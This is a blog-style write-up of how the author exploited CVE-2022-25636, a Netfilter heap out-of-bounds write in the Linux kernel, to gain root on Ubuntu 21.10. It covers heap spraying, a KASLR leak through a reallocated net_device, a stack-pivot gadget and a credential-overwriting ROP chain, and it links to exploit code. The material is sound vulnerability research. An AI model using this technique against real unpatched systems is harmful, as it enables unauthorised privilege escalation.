[ kernel ]

CVE-2022-25636

In this blog I will cover the exploitation details for CVE-2022-25636, a bug in the Linux kernel component Netfilter discovered by @kallsyms.
In his blog he already did a great work in explaining how he discovered the vulnerability. So here I will only focus on the exploitation phase.

Introduction

The bug consists in a heap out of bounds write in the function nft_fwd_dup_netdev_offload() located in nf_dup_netdev.c.
The bug was introduced in version 5.4.

The bug

Let’s take a look at the vulnerable function:

int nft_fwd_dup_netdev_offload(struct nft_offload_ctx *ctx,
			       struct nft_flow_rule *flow,
			       enum flow_action_id id, int oif)
{
	struct flow_action_entry *entry;
	struct net_device *dev;

	/* nft_flow_rule_destroy() releases the reference on this device. */
	dev = dev_get_by_index(ctx->net, oif);
	if (!dev)
		return -EOPNOTSUPP;

	entry = &flow->rule->action.entries[ctx->num_actions++];
	entry->id = id;
	entry->dev = dev;

	return 0;
}

Each time nft_fwd_dup_netdev_offload() is called ctx->num_actions will be incremented regardless of the initial size of rule->action.entries and the oob write will be triggered:

entry = &flow->rule->action.entries[ctx->num_actions++];
entry->id = id;
entry->dev = dev;

id is of type enum flow_action_id and in our case id = FLOW_ACTION_MIRRED = 5.
dev is a pointer to the targeted net_device struct.
net_device is a struct used to describe network devices ( such as “lo”, “eth0” etc.. ) which resides in the kmalloc-4096 slab and we will later describe it.

Exploitation

The vulnerability doesn’t give us a lot of control over the heap, but luckily it’s enough to give us a root shell :).
We will be targeting Ubuntu 21.10 using kernel version 5.13.0-30.
Let’s go step by step through the possible ideas for exploitation.

Leaking the heap
Leaking function pointers
RIP control

1. Leaking the heap

As we said before one of the values that is being written out of bounds is a pointer to a net_device struct, which resides on the heap.
If we manage to allocate a buffer, whose content will be returned to userland, after the struct rule we could make the dev pointer land in such buffer and later leak it.
One example for such buffer is the msg_msg struct.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------
0x00 |     list head *next   |    list head *prev      |  <- msg_msg
0x10 |          m_type       |        m_ts             |
0x20 |          *next        |        *security        |
0x30 |                       |                         |  <--|
0x40 |                       |                         |     |
0x50 |                       |                         |     | user data
0x60 |                       |                         |     |
0x70 |                       |                         |  <--|
     ---------------------------------------------------

By changing the number of accounted “dup” expressions we can choose the rule struct size i.e. the destination kmalloc slab.
This is the rule struct:

/* offset      |    size */  struct flow_rule {
/*      0      |      24 */    struct flow_match {
/*      0      |       8 */        struct flow_dissector *dissector;
/*      8      |       8 */        void *mask;
/*     16      |       8 */        void *key;
                               } match;
/*     24      |       8 */    struct flow_action {
/*     24      |       4 */        unsigned int num_entries;
/* XXX  4-byte hole      */
/*     32      |       0 */        struct flow_action_entry entries[];
                               } action;
                             }

For example if we only set one “dup” expression the rule buffer will be of size:
sizeof(struct flow_match) + sizeof(struct flow_action) =
sizeof(struct flow_match) + sizeof(unsigned int) + 1 * sizeof(struct flow_action_entry) =
24 + 4 + 1 * 80 = 108 -> kmalloc-128
So we can choose the kmalloc slab by increasing the number of accounted dups:

+ 1*80 = 108 -> kmalloc-128
+ 2*80 = 188 -> kmalloc-192
+ 3*80 = 268 -> kmalloc-512
...

`msg_msg` alternatives

The struct msg_msg is usually the way to go when spraying the heap. However the struct has a 0x30 bytes long header before the actual buffer:

struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts;		/* message text size */
	struct msg_msgseg *next;
	void *security;
	/* the actual message follows immediately */
};

// sizeof(struct msg_msg) = 0x30

Our leak consists of an heap OOB write, and we want to corrupt as few structures on the heap as possible.
Suppose that we set 1 accounted dup (so we are in kmalloc-128). If our heap spray was succesful (a msg_msg is directly after the rule struct) then the msg_msg header isn’t really a problem.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |                       |   *dev (oob 1)          |  <- msg_msg
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |                       |                         |  <--|
0x40 |         | id (oob 2)  |                         |     |
0x50 |                       |   *dev (oob 2)          |     | user data
0x60 |                       |                         |     |
0x70 |                       |                         |  <--|
     ---------------------------------------------------

To make the net_device pointer land in our buffer we would need to trigger 2 oob dups. The only corrupted field would be msg_msg.prev. But this is not a problem. The problem is that if our spray didn’t succeed, and after the rule we don’t have our msg_msg then we could be overwriting important data and make the kernel panic.
My solution to make this leak as much safe as possible was to use msg_msgseg instead of msg_msg.

Brief Linux IPC recap

When we call msgsnd() with a size > DATALEN_MSG (4096 - sizeof(msg_msg) bytes), our message is split on the heap using the msg_msg.next which points to a msg_msgseg struct.

struct msg_msgseg {
	struct msg_msgseg *next;
	/* the next part of the message follows immediately */
};

// sizeof(struct msg_msgsg) = 0x8

Look at that! We only have a 8 byte header now.
So if we call msgsnd() with size = (4096 - 0x30) + (128 - 0x8) we would get a msg_msg in kmalloc-4096 and a msg_msgseg in kmalloc-128.
Perfect! We can use this strategy to spray kmalloc-128 using msg_msgseg.

Back to our example. Now we only need 1 oob dup instead of 2:

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |         *next         |   *dev (oob 1)          |  <- msg_msgseg
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------

This way we only need 1 oob write. So that if our heap spray failed we corrupted at most 8 bytes, allowing us to try the spray again with less probability of crashing the kernel.

2. Leaking function pointers

Now that we have a stable heap leak we need to leak the base virtual address of the kernel .text.
The struct net_device contains many pointers to _ops structures (which are just structs containing function pointers), so if we find a way to leak its content we could defeat KASLR.

2.1 Overwriting net_device struct

A good starting point to leak kaslr would be to free the net_device struct and cause a UAF.
One way to free the net_device struct is to overwrite the msg_msg.security pointer with the net_device ptr during our OOB writes. Then during the freeing process of the msg_msg, msg_msg.security will be freed.

// msgrcv() -> free_msg() -> security_msg_msg_free()

void security_msg_msg_free(struct msg_msg *msg) {
	...
	kfree(msg->security);
	...
}

Here is where the exploit starts losing stability.
Let’s try to overwrite the security pointer using the kmalloc-128 slab.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |                       |   *dev (oob 1)          |  <- msg_msg
0x10 |                       |                         |
0x20 |                       |        *security        |  <- msg_msg.security
0x30 |                       |                         |  <--|
0x40 |         | id (oob 2)  |                         |     |
0x50 |                       |   *dev (oob 2)          |     | user data
0x60 |                       |                         |     |
0x70 |                       |                         |  <--|
     ---------------------------------------------------

Ooops, because of alignment issues we can’t just overwrite the security ptr. However if we use 1 more oob write:

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |                       |   *dev (oob 1)          |  <- msg_msg 1
0x10 |                       |                         |
0x20 |                       |                         |  <- msg_msg.security
0x30 |                       |                         |
0x40 |         | id (oob 2)  |                         |
0x50 |                       |   *dev (oob 2)          |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------
0x00 |                       |                         |  <- msg_msg 2
0x10 |         | id (oob 3)  |                         |
0x20 |                       |   *dev (oob 3)          |  <- msg_msg.security
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------

Yes! We overwrote the msg_msg.security ptr! Here the problem is that if our heap spray don’t succeed we could corrupt two different heap allocations.
The biggest problem is when directly after our rule struct there is a free chunk. In that case the id field of the second oob write would overwrite the freelist pointer, which would make the kernel panic very soon.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |         | id (acc dup)|                         |
0x30 |                       |   *dev (acc dup)        |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |         | id (oob 1)  |                         |
     ---------------------------------------------------
0x00 |                       |   *dev (oob 1)          | <- free chunk
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |                       |                         |
0x40 |         | id (oob 2)  |  <----------------------- freelist pointer
0x50 |                       |   *dev (oob 2)          |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------
0x00 |                       |                         |  <- msg_msg 1
0x10 |         | id (oob 3)  |                         |
0x20 |                       |   *dev (oob 3)          |  <- msg_msg.security
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
     ---------------------------------------------------

The idea is to switch the kmalloc slab used by the rule struct. Let’s increase the number of accounted dups from 1 to 2 (the rule struct is now in kmalloc-192) and the number of unaccounted dups to 6.

     ---------------------------------------------------
0x00 |                       |                         |  <- rule
0x10 |                       |                         |
0x20 |        |id (acc dup 1)|                         |
0x30 |                       |   *dev (acc dup 1)      |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |        |id (acc dup 2)|                         |
0x80 |                       |   *dev (acc dup 2)      |
0x90 |                       |                         |
0xa0 |                       |                         |
0xb0 |                       |                         |
     ---------------------------------------------------
0x00 |        | id (oob 1)   |                         |  <- msg_msg 1
0x10 |                       |   *dev (oob 1)          |
0x20 |                       |                         |
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |        | id (oob 2)   |                         |
0x60 |                       |   *dev (oob 2)          |
0x70 |                       |                         |
0x80 |                       |                         |
0x90 |                       |                         |
0xa0 |        | id (oob 3)   |                         |
0xb0 |                       |   *dev (oob 3)          |
     ---------------------------------------------------
0x00 |                       |                         |  <- msg_msg 2
0x10 |                       |                         |
0x20 |                       |                         |
0x30 |        | id (oob 4)   |                         |
0x40 |                       |   *dev (oob 4)          |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
0x80 |        | id (oob 5)   |                         |
0x90 |                       |   *dev (oob 5)          |
0xa0 |                       |                         |
0xb0 |                       |                         |
     ---------------------------------------------------
0x00 |                       |                         |  <- msg_msg 3
0x10 |        | id (oob 6)   |                         |
0x20 |                       |   *dev (oob 6)          |  <- msg_msg.security
0x30 |                       |                         |
0x40 |                       |                         |
0x50 |                       |                         |
0x60 |                       |                         |
0x70 |                       |                         |
0x80 |                       |                         |
0x90 |                       |                         |
0xa0 |                       |                         |
0xb0 |                       |                         |
     ---------------------------------------------------

Here if our heap spray doesn’t succeed then we could theoretically overwrite 3 different heap structures and maybe cause a kernel panic.
However there isn’t the danger of overwriting the freelist ptr.

One bonus point is that when we overwrite the security field of the msg_msg we are also overwriting the msg_msg.m_type.
If during msgsnd() we set the msg_msg.m_type to 0x4141414141414141, when freeing the msg_msg structs we can check if one of the m_type is 0x4141414100000005.
If that happens then we know we succesfully overwrote the security field.

Reallocating the net_device struct

Once we freed the net_device struct we can spray the kmalloc-4096 slab to overwrite the struct.
Most of the operations on the net_device struct will access data stored at the top of the struct (i.e. in the first 0x30 bytes of the allocation), such as the net_device.name, which is the first field of the struct.
For that reason we need to control the full reallocated chunk and thus we can’t use msg_msg spray. We need to use another spraying technique, the setxattr spray.
Usually the setxattr spray is done together with userfaultfd, however the unprivileged_userfaultfd sysctl knob doesn’t allow unprivileged user to use it.
As an alternative I used the FUSE technique, which allows to halt the kernel on a copy_to/from_user exactly like userfaultfd. To learn more about the FUSE technique I reccomend reading this writeup for CVE-2022-0185.

kmalloc-4096 spray

And what if during our kmalloc-4096 spray we dont’ overwrite the net_device struct?
The net_device struct has a field int ifindex. This field can be retrieved by the SIOCGIFINDEX ioctl, which takes the name of the net_device, in our case “lo”.
We can call this ioctl using the if_nametoindex(char *ifname) function.
For example if “lo” has ifindex = 1 then if_nametoindex("lo") returns 1.
When we overwrite the net_device struct we can set the ifindex to a recognizable value (e.g 0x41414141),
so that during the exploit we can check if if_nametoindex("lo") returns 0x41414141, and in such case we are sure that the net_device was overwritten.

2.2 Obtaining arbitrary read

The struct net_device has a field unsigned char *dev_addr.
This field normally points to the mac address of the net_device, and its length is specified by the unsigned char addr_len field.
One way to read from dev_addr is through the SIOCGIFHWADDR ioctl. Here is an example:

struct ifreq *ifr = calloc(1, 0x1000);
strcpy(ifr->ifr_name, "lo");

int fd = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP);
if(!fd) {
	perror("socket()");
	exit(1);
}

if(ioctl(fd, SIOCGIFHWADDR, ifr) != 0) {
	perror("ioctl(SIOCGIFHWADDR)");
	exit(1);
}

This is the ioctl handler:

int dev_ioctl(struct net *net, unsigned int cmd, struct ifreq *ifr,
	      void __user *data, bool *need_copyout)
{
	...
	switch (cmd) {
	case SIOCGIFHWADDR:
		dev_load(net, ifr->ifr_name);
		ret = dev_get_mac_address(&ifr->ifr_hwaddr, net, ifr->ifr_name);

		...

		return ret;
	...
	}
}

dev_get_mac_address:

int dev_get_mac_address(struct sockaddr *sa, struct net *net, char *dev_name)
{
	...
	struct net_device *dev;
	...

	dev = dev_get_by_name_rcu(net, dev_name);
	
	...

	if (!dev->addr_len)
		memset(sa->sa_data, 0, size);
	else
		memcpy(sa->sa_data, dev->dev_addr, min_t(size_t, size, dev->addr_len)); // <--- arb read

	...
}

Perfect! After reallocating our net_device we can set the dev_addr pointer to somewhere in the heap and leak data.
But what do we leak? After reallocating the net_device all of the useful _ops pointers are gone ( both because of init_on_alloc and because we overwrote it with our data ).
An interesting fact is that when unsharing into a network namespace, a new net_device for “lo” is allocated. The idea is the following:

clone() a child using CLONE_NEWNET and leak its net_device ptr as we did before.
In the parent process leak the net_device (the two net_device leaks are different!!).
Now we can free the parent’s net_device, reallocate it, and overwrite the
dev_addr ptr with the address of the child’s net_device (which remains untouched and thus still contain many _ops pointers!).
Call ioctl(SIOCGIFHWADDR) in the parent process and boom we leaked KASLR :)

The leak I chose is net_device.netdev_ops, which in our case points to loopback_ops.

3. RIP control

Now we have both an heap and .text leak :). We are very close.
As we said before the net_device contains many _ops pointers, so when reallocating the net_device struct we can set one of the _ops pointers to somewhere in our heap allocation, set one of its function pointers and execute arbitrary functions.
Obviosuly SMEP is enabled so we can’t just jump back in userland.
The idea is to perform stack pivoting, we can control the heap allocation so we can store our pivoted stack on kernel heap and thus bypass SMAP.
Luckily the kernel is full of useful gadgets to perform stack pivoting.
Most of the net_device function pointers are invoked with the first parameter set to the net_device ptr. So a gadget that pivots the stack to $rdi is perfect. This is the one I found:

push   rdi
add    BYTE PTR [rbx+0x41],bl
pop    rsp
pop    r13
pop    rbp
ret 

Perfect! Now we can simply put a commit_creds(prepare_kernel_cred(0)) ropchain at the top of the reallocated net_device and get root.
The function pointer I decided to overwrite is dev.ethtool_ops->begin.
To call the ->begin function we can use the SIOCETHTOOL ioctl:

int dev_ioctl(struct net *net, unsigned int cmd, struct ifreq *ifr,
	      void __user *data, bool *need_copyout)
{
	...
	switch (cmd) {
	...
	case SIOCETHTOOL:
		dev_load(net, ifr->ifr_name);
		...
		ret = dev_ethtool(net, ifr);
		...
	...
	}
}

dev_ethtool:

int dev_ethtool(struct net *net, struct ifreq *ifr)
{
	struct net_device *dev = __dev_get_by_name(net, ifr->ifr_name);
	...
	if (dev->ethtool_ops->begin) {
		rc = dev->ethtool_ops->begin(dev);
		if (rc  < 0)
			return rc;
	}
	...
}

This is how the reallocated net_device will look like:

      ---------------------------------------------------
0x000 |    dev.name = "lo"    |                         |  <- net_device
0x010 |                       |                         |  <--|
0x020 |                       |                         |     | Pivoted stack
0x030 |                       |                         |     |
0x040 |                       |                         |     |
0x050 |                       |                         |  <--|
0x060 |                       |                         |
0x070 |                       |                         |
...
0x420 |  dev.ethtool_ops ptr  |  ethtool_ops.begin      |  <- stack pivot gadget
...
      ---------------------------------------------------

The ropchain I used is the following:

// set $rdi = 0
pop rdi; ret;

prepare_kernel_cred();

// clear Zero Flag, so that the next jne doesn't jump
xor dh, dh; ret;

pop; pop; pop; ret;

// set $rdi to return value of prepare_kernel_cred()
mov rdi, rax; jne; ret;

commit_creds()

// return to userland
kpti_trampoline_pop_rax_pop_rdi_swapgs_iretq

The pop_pop_pop_ret gadget is there because in order to call dev.ethtool_ops->begin we must satisfy a check present in dev_ethtool.

int dev_ethtool(struct net *net, struct ifreq *ifr)
{
	struct net_device *dev = __dev_get_by_name(net, ifr->ifr_name);
	...
	if (!dev || !netif_device_present(dev)) // <----- this
		return -ENODEV;
	...
	if (dev->ethtool_ops->begin) {
		rc = dev->ethtool_ops->begin(dev);
		if (rc  < 0)
			return rc;
	}
	...
}

static inline bool netif_device_present(const struct net_device *dev)
{
	return test_bit(__LINK_STATE_PRESENT, &dev->state);
}

net_device.state is a bitset and the bit __LINK_STATE_PRESENT must be set to 1.
Unluckily the unsigned long state field is at the top of the net_device struct and it’s in the middle of our pivoted stack.
We can just set net_device.state = 0xffffffffffffffff and use an extra pop that just pollutes an unused register and continue the ropchain.

Wrapping up

We create a child process with a new network namespace
In the child process we leak its net_device pointer
In the parent process we leak its net_device pointer
Free the parent’s net_device
Reallocate it and overwrite net_device.dev_addr with the address of the child’s net_device
Leak KASLR by reading net_device.dev_addr
Free the parent’s net_device again
Reallocate it and store a pivoted stack at the top of the heap allocation and overwrite a function pointer with a stack pivot gadget
Call the gadget, perform stack pivoting and get root :)

Poc

POC on Ubuntu 21.10

Exploit code

You can find my exploit on Github: https://github.com/Bonfee/CVE-2022-25636